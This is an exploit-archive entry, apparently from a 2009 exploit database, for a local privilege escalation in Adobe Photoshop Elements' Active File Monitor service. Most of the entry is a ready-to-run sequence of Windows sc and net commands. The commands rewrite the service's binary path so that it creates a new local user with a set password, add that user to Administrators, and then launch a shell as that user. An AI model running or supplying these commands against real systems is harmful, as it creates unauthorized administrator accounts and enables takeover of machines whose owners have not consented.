Adobe Photoshop Elements Active File Monitor Service Local Privilege Escalation Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Adobe Photoshop Elements Active File Monitor Service Local Privilege Escalation Vulnerability
# Published : 2009-11-11
# Author : bellick
# Previous Title : Multiple Vendor TLS Protocol Session Renegotiation Security Vulnerability
# Next Title : Free Download Manager Torrent File Parsing Multiple Remote Buffer Overflow Vulnerabilities

To exploit this issue, attackers require local, interactive access to an affected computer.

The following example commands are available:

sc stop "AdobeActiveFileMonitor8.0"
sc config "AdobeActiveFileMonitor8.0" binPath= "cmd /c net user adobe kills /add &amp;&amp; net localgroup Administrators adobe /add"
sc start "AdobeActiveFileMonitor8.0"
runas /noprofile /user:%COMPUTERNAME%adobe cmd